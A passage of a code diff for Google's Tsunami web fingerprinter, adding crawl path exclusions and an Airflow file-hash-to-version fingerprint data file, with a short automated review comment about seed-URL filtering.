+++ b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawler.java @@ -26,6 +26,7 @@ import com.google.common.util.concurrent.ListeningExecutorService; import com.google.tsunami.common.net.http.HttpClient; import com.google.tsunami.common.net.http.HttpMethod; +import com.google.tsunami.plugins.fingerprinters.web.WebServiceFingerprinterConfigs; import com.google.tsunami.proto.CrawlConfig; import com.google.tsunami.proto.CrawlResult; import com.google.tsunami.proto.CrawlTarget; @@ -45,15 +46,18 @@ public final class SimpleCrawler implements Crawler { private final ForkJoinPool forkJoinPool; private final ListeningExecutorService schedulingPool; private final HttpClient httpClient; + private final WebServiceFingerprinterConfigs configs; @Inject SimpleCrawler( @SimpleCrawlerWorkerPool ForkJoinPool forkJoinPool, @SimpleCrawlerSchedulingPool ListeningExecutorService schedulingPool, - HttpClient httpClient) { + HttpClient httpClient, + WebServiceFingerprinterConfigs configs) { this.forkJoinPool = checkNotNull(forkJoinPool); this.schedulingPool = checkNotNull(schedulingPool); this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(false).build(); + this.configs = checkNotNull(configs); } @Override @@ -76,7 +80,7 @@ private SimpleCrawlAction buildCrawlAction( CrawlConfig crawlConfig, String url, SimpleCrawlerResults crawlerResults) { CrawlTarget crawlTarget = CrawlTarget.newBuilder().setHttpMethod(HttpMethod.GET.toString()).setUrl(url).build(); - return new SimpleCrawlAction(0, httpClient, crawlConfig, crawlTarget, crawlerResults); + return new SimpleCrawlAction(0, httpClient, crawlConfig, crawlTarget, crawlerResults, configs); } private ListenableFuture startCrawlAction( 
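Review bot: In the `@@ -76,7 +80,7 @@` hunk, `buildCrawlAction` hands the seed URL to `SimpleCrawlAction` at depth 0 without checking it against `configs.getPathExclusions()`; the only exclusion check in this commit is on links discovered in `spawnNewCrawlActions`. A seed URL that matches an exclusion pattern would therefore still be requested, which matters when the list is meant to keep the scanner away from specific endpoints. Either filter seeds with `!CrawlConfigUtils.isCrawlTargetInBlockList(crawlTarget, configs.getPathExclusions())` before the action is built, or state in the flag description that exclusions apply only to discovered links. `buildCrawlAction` begins just above the hunk and the code that supplies the seed list is not shown, so this may already be handled there.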
diff --git a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/detection/SoftwareDetector.java b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/detection/SoftwareDetector.java index e0e6741bc..c40a2c4c7 100644 --- a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/detection/SoftwareDetector.java +++ b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/detection/SoftwareDetector.java @@ -240,7 +240,7 @@ public static Builder builder() { /** Builder for {@link DetectedSoftware}. */ @AutoValue.Builder - abstract static class Builder { + public abstract static class Builder { public abstract Builder setSoftwareIdentity(SoftwareIdentity value); public abstract Builder setRootPath(String value); public abstract Builder setContentHashes(ImmutableMap value); diff --git a/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/airflow.binproto b/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/airflow.binproto new file mode 100644 index 000000000..1e7d453af --- /dev/null +++ b/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/airflow.binproto 
@@ -0,0 +1,2720 @@ + + +airflow^ +8static/dist/airflowDefaultTheme.c19bf634a906347cf1a0.css" + 7ec48ba6cf8e0da2794eea814716f908X +2static/dist/materialIcons.f9559e4953177b8b9a4a.css" + 6a5cf061713bc440a736368163188d76 +"static/appbuilder/js/ab_filters.js" + 74144ee417aadc310d896041e6587e92" + dcd68d71656b8682d494d45bb1b1d0dd" + f2893426e1d9833d278285d1b4ab6f00" + 814ad04f26a6a78ad0c37349739aa574" + b3ecc15d7dfbea6143d342a262d6ea21" + 9977922fd9659a1d9fde6c7f401daa5b" + a2d1aa28848b92791b1aa38262c55e88[ +5static/appbuilder/datepicker/bootstrap-datepicker.css" + 582d3181dba9c37f7860710244393e8eN +(static/dist/main.d6649b884746315637be.js" + 06c544de1025c42f685b80896dfe615a +%static/appbuilder/js/jquery-latest.js" + d6de181c1ee3791ea45e3fbdf389fe55" + 72a7f671a4f9e51d3256ea9ad9e3514f" + a8222f5cfec7f13c0d4fe26e88b452b0^ +8static/dist/airflowDefaultTheme.fd803ddb438e3d518eb3.css" + 2a36dc5b58c5b05ffb14214d54cb887fN +(static/dist/main.0b3299d0b0db1076c096.js" + 4c585872f4045fb240844f8cd47199e0P +*static/dist/moment.805846635248ee428644.js" + 33531a4d086c6477be55a8820e4ddfb9O +)static/dist/main.c76c4a9850bda3fb5599.css" + 58d2c2ce24439ff4e80e9197751fbbeeN +(static/dist/main.ec58b0ff6b26d248d142.js" + 00b600a312f0d6342ea50bae1061e3f1P +*static/dist/moment.c61e3ab5bc7680097402.js" + 8b2eef2d6a791b1955d27f4728aad10bN +(static/dist/main.9a020ab96cfff52e09fb.js" + 123b48df6cc249acb1a7aaacf50cba6cP +*static/dist/flash.5adc3a4998ff394d2a3e.css" + 61d629a3277f4159129ee6e27c9d25b2V +0static/dist/loadingDots.d58d573e7e3fd22bcfc6.css" + 27bcf2a4eee3bdcfdb0b03f3ef79c4adP +*static/dist/flash.39f43f5a4fffad4cd720.css" + 8c698c36f86b858e5edbd79bc1e9799cX +2static/dist/materialIcons.542fbb9fa8b5a2ec811b.css" + 6a5cf061713bc440a736368163188d76X +2static/dist/materialIcons.7310810fa0ee22536071.css" + 6a5cf061713bc440a736368163188d76O +)static/dist/main.0b3299d0b0db1076c096.css" + 1f369178e63ecf1c7228ec97acbe9a2bP +*static/appbuilder/css/font-awesome.min.css" + 
589e24c189b18e7e92667246936513e1P +*static/dist/flash.7fb10b5a80aea0a37122.css" + 61d629a3277f4159129ee6e27c9d25b2Q ++static/appbuilder/js/select2/select2.min.js" + 383cd3a04454b72cb2ed7baaf3845ebcO +)static/dist/main.7c8f9340325b929761a0.css" + 033045ec62f60a11d68307d0965275ebN +(static/dist/main.255b39340a749864c22a.js" + 1c071388475e5d34319b4b6f456bec60N +(static/dist/main.c76c4a9850bda3fb5599.js" + f16e815edfddb662d578e5e413a9885aX +2static/dist/materialIcons.087c3315826ce743dc8d.css" + 6a5cf061713bc440a736368163188d76X +2static/dist/materialIcons.b5be025c4c658382069b.css" + 6a5cf061713bc440a736368163188d76O +)static/dist/main.e52cf607b64cdcd15089.css" + d3edf253616b51dec9371ba6c8c1946d +'static/dist/bootstrap3-typeahead.min.js" + f86226b966de712b24d1772195fb9482" + 84dda4b845b768f63084be203d54db93" + c55eca542a4598b5f26c8b777852fdedP +*static/dist/flash.82c9e653b17d76b0b572.css" + f25cdcdd43d8f815c82f22ceeadd76aaV +0static/dist/loadingDots.5da42d00b5455806e709.css" + 27bcf2a4eee3bdcfdb0b03f3ef79c4adq +'static/appbuilder/css/flags/flags16.css" + 163ceda19d640c9636e25216356212ad" + c0ed5753f6e056b261b63ee5c2fb6514n +Hstatic/appbuilder/css/bootstrap-datepicker/bootstrap-datepicker3.min.css" + d91a504980d503f5a97e0f795bc7059eo +%static/appbuilder/select2/select2.css" + e80f0fcf36346801eeda8509dcf54e5a" + 8fc023ad64861b58b154089c33de2065P +*static/dist/moment.c1933ee062e9650051f7.js" + 1daacbf407af4369f7770154d3b0174fO +)static/dist/main.1752c6e8005878f87b5e.css" + 8eb9532b0b9bde86323cc7a21e07c370 +static/appbuilder/css/ab.css" + 01ecf28c115d206c6c14586b074671e5" + b764048d1982806cb753c798853c829d" + fe613a88bf5477073ff5ea9d27c86760P +*static/dist/flash.d2167ed6d99f8d7833ef.css" + f25cdcdd43d8f815c82f22ceeadd76aaO +)static/dist/main.255b39340a749864c22a.css" + aba90e2e1a3f359bf11241ff0983e01b +,static/dist/bootstrap-datetimepicker.min.css" + 290df06b00f38ac4b62000e181566917" + 3862b83990c3ecaaf9b8a8dd45f3fee9" + 1e98719a524ce71c746517645b77aaa5V 
+0static/dist/loadingDots.37c7fd200eafd0c27df7.css" + 27bcf2a4eee3bdcfdb0b03f3ef79c4adO +)static/dist/main.7482f675ad7c97dc7702.css" + ad767bf5daa820f1aae5c70f3bfbda0dN +(static/dist/main.527e9326c35043674708.js" + b4abc9bcc7974e25cb7090e05aa88fbe +confirm" + a61ed07273fe3e596ff8cd9a7425bd9c" + 39efa05dd63321d06fddcbd2917019d4" + 573fea78ca5fa359ccb095cfcfa0f916" + 7db6532c8680893f2f8e859c8e705a5e" + 53e33527c5b23bdbe8d8e601a886afc6" + 4d22cef9ed9c93232ebb0ca70eca3a2f" + ab7970dad1bdbaae28dc2fb71d3361daO +)static/dist/main.a02ab09a012af15327d8.css" + 2388345c822d79757b4ab5ee1f39d9c3O +)static/dist/main.6f9728400381098372e3.css" + eda89148bdd5e0a11f99557cc5b0943bO +)static/dist/main.c6ddfe9182894d4d9d8d.css" + a7f630d0a5b4ffed3862498c8ba76592N +(static/dist/main.a53ccbaa4ca384c91837.js" + 6326b461dab6894b1893e0f5ca54f07aP +*static/dist/moment.fad363e66ff398a6fbf3.js" + 1f0b461b6b441e43279fa7e6beeabc50y +/static/appbuilder/css/fontawesome/solid.min.css" + ad372c4e8b277cee9ffb5a342ab9618a" + 04eea7ad3395e96d6bd4a43e64048ac0O +)static/dist/main.4326607f6e6a434600a7.css" + aecfd839bc51ac88c092ac68f7375d20O +)static/dist/main.da956f078ba1725e3daf.css" + 1f369178e63ecf1c7228ec97acbe9a2b +static/appbuilder/js/ab.js" + aad12c6f56d7bb26d7cf25f8ddec911b" + 7832a44c4160360a9d55f1234bc4af03" + 448454a92aefd52c3b8ed1941e669209" + a553cece457b2a592bf58e0416f42171" + c6f68feb31ea40e8d35a1bdbe672f354N +(static/dist/main.795f05be1714e3254570.js" + b8dee7871e22bc45554dbc201885b574k +Estatic/appbuilder/js/bootstrap-datepicker/bootstrap-datepicker.min.js" + ce524b7a84d22eaca558822c6b260687[ +5static/appbuilder/select2/select2-bootstrap-theme.css" + 90a7f3f8ce22fc33ddd2a1101642aa0bP +*static/dist/flash.2b1a873e0aabc828a165.css" + 61d629a3277f4159129ee6e27c9d25b2S +-static/appbuilder/css/select2/select2.min.css" + 6383020b3548e9cfcc82f1bf609a968bP +*static/dist/moment.c42e4c391a00d2899c5c.js" + 43781e44ba946faa49fd925e223d1ce1] +7static/appbuilder/css/select2/select2-bootstrap.min.css" + 
90a7f3f8ce22fc33ddd2a1101642aa0b ++static/dist/bootstrap-datetimepicker.min.js" + d078fa2acac80591b63741c6cddf0163" + a6cf07e56ff0fdf9aef4972c82b5916b" + 86c551b382867bf234b7b75fe0c8a74c" + 7b96ade8af36874c83365352e639531d" + cce406db8272fc9dde3737c4350fadd1P +*static/dist/flash.abc94ba72cd821e27f31.css" + 61d629a3277f4159129ee6e27c9d25b2^ +8static/dist/airflowDefaultTheme.3e8bda71892b61b62f94.css" + 315bbe6824f586b49f2b803b067baeb1^ +8static/dist/airflowDefaultTheme.42f8d9f03e53e5b06087.css" + 7ec48ba6cf8e0da2794eea814716f908X +2static/appbuilder/css/fontawesome/v4-shims.min.css" + 5c8823187714a8cc3474782acf989c4aV +0static/dist/loadingDots.4bccfb4c41b26eefcf1c.css" + 6036059bd0d6736469d7678989dde978O +)static/dist/main.d6649b884746315637be.css" + 8eb9532b0b9bde86323cc7a21e07c370Z +4static/appbuilder/datepicker/bootstrap-datepicker.js" + d2c4f7d3876b83145cf4df68ce8a72ecO +)static/dist/main.a53ccbaa4ca384c91837.css" + aba90e2e1a3f359bf11241ff0983e01bN +(static/dist/main.e52cf607b64cdcd15089.js" + 0a703328e9f1bef59839282e04a977a6X +2static/dist/materialIcons.c86800f70eece0ad5c3e.css" + 35462396579d3bda4db6f79eb689d4dbN +(static/dist/main.a02ab09a012af15327d8.js" + 49c428e499aa36fa1d48f7f72bb7fe13P +*static/dist/flash.a58a9322159cd5cd08c3.css" + 8c698c36f86b858e5edbd79bc1e9799c^ +8static/dist/airflowDefaultTheme.c70a0986eb5cd4851faa.css" + 2a36dc5b58c5b05ffb14214d54cb887fP +*static/dist/moment.e5f820b9b99df22a8206.js" + 3336a688f7fa86f866b7af782bd43276V +0static/dist/loadingDots.84963375c34df3f17aab.css" + 27bcf2a4eee3bdcfdb0b03f3ef79c4adr +(static/dist/main.bde72ea87585ebc44fe9.js" + f974940d669a9198f5183b441e36981b" + 4f79c5e47de4b2211a237034f72c63f3P +*static/dist/flash.d205b61edc54ed448412.css" + 06e544a86c0fc43c89bd1eae320057c7^ +8static/dist/airflowDefaultTheme.731e57571b52cca4350d.css" + 493417b6d552d7505685c925a1370b8e{ +1static/appbuilder/css/fontawesome/regular.min.css" + 8affbd9d23b61f3e78c748cf752d8fab" + e21f1e382dc4d68c4ba647765afb0369O 
+)static/dist/main.9645e1e98ff7a669aff7.css" + eda89148bdd5e0a11f99557cc5b0943bV +0static/dist/loadingDots.36f1f76c70002f18243a.css" + 27bcf2a4eee3bdcfdb0b03f3ef79c4adP +*static/dist/flash.e22a7e35f238b0bc744f.css" + 61d629a3277f4159129ee6e27c9d25b2o +%static/appbuilder/js/bootstrap.min.js" + aa01b9bc0b765a8cb32d66b9d92c5bd8" + b856fe5f606651a03887c94843930354^ +8static/dist/airflowDefaultTheme.c93fb34380b84747e945.css" + 35a9e0341e792d4639de43afa32ba78aP +*static/dist/moment.dae03602a1cb62165b62.js" + a0af07dff99838db072173ba2a90c121X +2static/dist/materialIcons.ce0f77d10d4dc51f5f07.css" + 6a5cf061713bc440a736368163188d76N +(static/dist/main.1752c6e8005878f87b5e.js" + 903e1ea197c2e5546fca258dad806048^ +8static/dist/airflowDefaultTheme.9c52407a4b82b6d0a2da.css" + 35a9e0341e792d4639de43afa32ba78a^ +8static/dist/airflowDefaultTheme.d3d1b0809f936a6f2b56.css" + 493417b6d552d7505685c925a1370b8eV +0static/dist/loadingDots.f9d109f104217ec97cea.css" + 6036059bd0d6736469d7678989dde978O +)static/dist/main.bde72ea87585ebc44fe9.css" + 71b19163a59e66e52370342c813621bft +*static/dist/moment.0fcb6b41ff6a87cf079e.js" + a4cf644a6a883f40a1f67fd17bc93017" + 3fdf1bd73e77bdd043a6fbde0700728bV +0static/dist/loadingDots.4033edd9abf2750d6f8f.css" + 27bcf2a4eee3bdcfdb0b03f3ef79c4adO +)static/dist/main.ec58b0ff6b26d248d142.css" + aecfd839bc51ac88c092ac68f7375d20z +0static/appbuilder/css/fontawesome/brands.min.css" + a8469da629cb1fd1af9ef78e1751d796" + f2df63c28cde1d80b7171ea5c3ea50cel +"static/appbuilder/js/ab_actions.js" + ec4db40dd9287b27e476b3817ade4179" + e47efb285dbeb5153153b7243d0e9642^ +8static/dist/airflowDefaultTheme.ce329611a683ab0c05fd.css" + 315bbe6824f586b49f2b803b067baeb1O +)static/dist/main.9a020ab96cfff52e09fb.css" + ad767bf5daa820f1aae5c70f3bfbda0dN +(static/dist/main.da956f078ba1725e3daf.js" + 8ba30909b8da7afd74489c6d39499138[ +5static/appbuilder/css/fontawesome/fontawesome.min.css" + 5660141a1160968edc60b0767cdd90d0V +0static/dist/loadingDots.1392f729dc9855a280a8.css" + 
27bcf2a4eee3bdcfdb0b03f3ef79c4adP +*static/dist/moment.26f1d838a0f59697623d.js" + 7b2985eb524ff5de6c53acda3b5b7ec4N +(static/dist/main.7c8f9340325b929761a0.js" + 737e69c48900d5757196304061957d7eO +)static/dist/main.527e9326c35043674708.css" + ad767bf5daa820f1aae5c70f3bfbda0dX +2static/dist/materialIcons.4f9d67516ebe00c0bbb6.css" + 35462396579d3bda4db6f79eb689d4dbO +)static/dist/main.559baa8766c31899215b.css" + 256c8bbcf8bae1e2cdbec8ad34191ed9N +(static/dist/main.6f9728400381098372e3.js" + 89368864a978718689f72f1de3ee3bd9X +2static/dist/materialIcons.3221294eb511f43d1b15.css" + 6a5cf061713bc440a736368163188d76P +*static/dist/moment.1a09402fe354380806b9.js" + 818a6ccf142b1f46728ccc79106b30e3P +*static/dist/moment.197a6f3cab42e240f8bd.js" + 4aec2a527a719fcacc739af5c1450129M +'static/appbuilder/css/bootstrap.min.css" + aac3da63f60267eac4ef43812790449dN +(static/dist/main.559baa8766c31899215b.js" + 49c428e499aa36fa1d48f7f72bb7fe13N +(static/dist/main.9645e1e98ff7a669aff7.js" + cac3dc4824469d7cab68a5fb96499758N +(static/dist/main.4326607f6e6a434600a7.js" + 43cf951e92fc308700077fc04bb4d507N +(static/dist/main.c6ddfe9182894d4d9d8d.js" + f16e815edfddb662d578e5e413a9885a^ +8static/dist/airflowDefaultTheme.a27149057fd893ed3d09.css" + 35a9e0341e792d4639de43afa32ba78aP +*static/dist/flash.eb8d441e4edaecf40ce7.css" + 99d6845a3a60e63c8890a4f93182425bn +$static/appbuilder/select2/select2.js" + 6b2af8bd67692deaa981668b25aa4bc4" + 03527a0dc02ecb3dde68e0cc600157c9N +(static/dist/main.7482f675ad7c97dc7702.js" + f6c4565173addd0f0cfab9503bac98fe7 +static/pin_32.png" + 31cf27939eac2ff81538e6514f3500f8O +)static/dist/main.795f05be1714e3254570.css" + ad767bf5daa820f1aae5c70f3bfbda0dX +2static/dist/materialIcons.e5d66b6b5f98c05254bf.css" + 6a5cf061713bc440a736368163188d76Q +" + ce524b7a84d22eaca558822c6b260687 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4 +" + 03527a0dc02ecb3dde68e0cc600157c9 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 
+2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0? +" + dcd68d71656b8682d494d45bb1b1d0dd +2.7.3 +2.7.2 +2.7.1? +" + 1f369178e63ecf1c7228ec97acbe9a2b +2.3.2 +2.3.1 +2.3.0l +" + 6b2af8bd67692deaa981668b25aa4bc4 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0Q +" + 163ceda19d640c9636e25216356212ad +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4? +" + 8b2eef2d6a791b1955d27f4728aad10b +2.0.2 +2.0.1 +2.0.0Q +" + d91a504980d503f5a97e0f795bc7059e +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.46 +" + 43cf951e92fc308700077fc04bb4d507 +2.5.3 +2.5.2H +" + 06e544a86c0fc43c89bd1eae320057c7 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +" + e47efb285dbeb5153153b7243d0e9642 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0H +" + 6326b461dab6894b1893e0f5ca54f07a +2.4.3 +2.4.2 +2.4.1 +2.4.0H +" + 3fdf1bd73e77bdd043a6fbde0700728b +2.7.3 +2.7.2 +2.7.1 +2.7.0 +" + 8fc023ad64861b58b154089c33de2065 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0 +" + 5c8823187714a8cc3474782acf989c4a +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.8.4 +" + c0ed5753f6e056b261b63ee5c2fb6514 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0Q +" + ad372c4e8b277cee9ffb5a342ab9618a +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4- +" + 737e69c48900d5757196304061957d7e +2.1.0 +" + aac3da63f60267eac4ef43812790449d +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 
+2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0 +2.8.4c +" + a8222f5cfec7f13c0d4fe26e88b452b0 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0 +" + b856fe5f606651a03887c94843930354 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0 +" + 582d3181dba9c37f7860710244393e8e +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0Z +" + a553cece457b2a592bf58e0416f42171 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2- +" + b8dee7871e22bc45554dbc201885b574 +2.7.1H +" + 7ec48ba6cf8e0da2794eea814716f908 +2.1.0 +2.0.2 +2.0.1 +2.0.0? +" + 49c428e499aa36fa1d48f7f72bb7fe13 +2.0.2 +2.0.1 +2.0.0 +" + 84dda4b845b768f63084be203d54db93 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +" + fe613a88bf5477073ff5ea9d27c86760 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0- +" + 43781e44ba946faa49fd925e223d1ce1 +2.3.3Q +" + a4cf644a6a883f40a1f67fd17bc93017 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4- +" + a0af07dff99838db072173ba2a90c121 +2.3.4u +" + 7b96ade8af36874c83365352e639531d +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2Q +" + d078fa2acac80591b63741c6cddf0163 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4- +" + a61ed07273fe3e596ff8cd9a7425bd9c +2.2.5 +" + 35a9e0341e792d4639de43afa32ba78a +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.8.4l +" + 
f2df63c28cde1d80b7171ea5c3ea50ce +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +" + 61d629a3277f4159129ee6e27c9d25b2 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0Q +" + aa01b9bc0b765a8cb32d66b9d92c5bd8 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4Q +" + 8affbd9d23b61f3e78c748cf752d8fab +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4Q +" + f86226b966de712b24d1772195fb9482 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4- +" + 3862b83990c3ecaaf9b8a8dd45f3fee9 +2.1.1l +" + b764048d1982806cb753c798853c829d +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.06 +" + 8eb9532b0b9bde86323cc7a21e07c370 +2.3.4 +2.3.3Q +" + a8469da629cb1fd1af9ef78e1751d796 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4- +" + 573fea78ca5fa359ccb095cfcfa0f916 +2.2.3- +" + 4d22cef9ed9c93232ebb0ca70eca3a2f +2.2.0 +" + 86c551b382867bf234b7b75fe0c8a74c +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3Q +" + 9977922fd9659a1d9fde6c7f401daa5b +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4- +" + 00b600a312f0d6342ea50bae1061e3f1 +2.5.1Q +" + 383cd3a04454b72cb2ed7baaf3845ebc +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4 +" + 72a7f671a4f9e51d3256ea9ad9e3514f +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4Q +" + cce406db8272fc9dde3737c4350fadd1 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0H +" + f25cdcdd43d8f815c82f22ceeadd76aa +2.1.0 +2.0.2 +2.0.1 +2.0.0- +" + 53e33527c5b23bdbe8d8e601a886afc6 +2.2.1- +" + 06c544de1025c42f685b80896dfe615a +2.3.3c +" + a2d1aa28848b92791b1aa38262c55e88 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0Q +" + aad12c6f56d7bb26d7cf25f8ddec911b +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4 +" + b3ecc15d7dfbea6143d342a262d6ea21 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.46 +" + a7f630d0a5b4ffed3862498c8ba76592 +2.2.1 +2.2.0l +" + 
e21f1e382dc4d68c4ba647765afb0369 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +" + c55eca542a4598b5f26c8b777852fded +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0Q +" + 74144ee417aadc310d896041e6587e92 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4c +" + a6cf07e56ff0fdf9aef4972c82b5916b +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.3.2 +2.3.1 +2.3.0H +" + 35462396579d3bda4db6f79eb689d4db +2.1.0 +2.0.2 +2.0.1 +2.0.0Q +" + d6de181c1ee3791ea45e3fbdf389fe55 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4Q +" + aba90e2e1a3f359bf11241ff0983e01b +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0Q +" + 01ecf28c115d206c6c14586b074671e5 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.8.4l +" + e80f0fcf36346801eeda8509dcf54e5a +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0? +" + aecfd839bc51ac88c092ac68f7375d20 +2.5.3 +2.5.2 +2.5.1 +" + 290df06b00f38ac4b62000e181566917 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 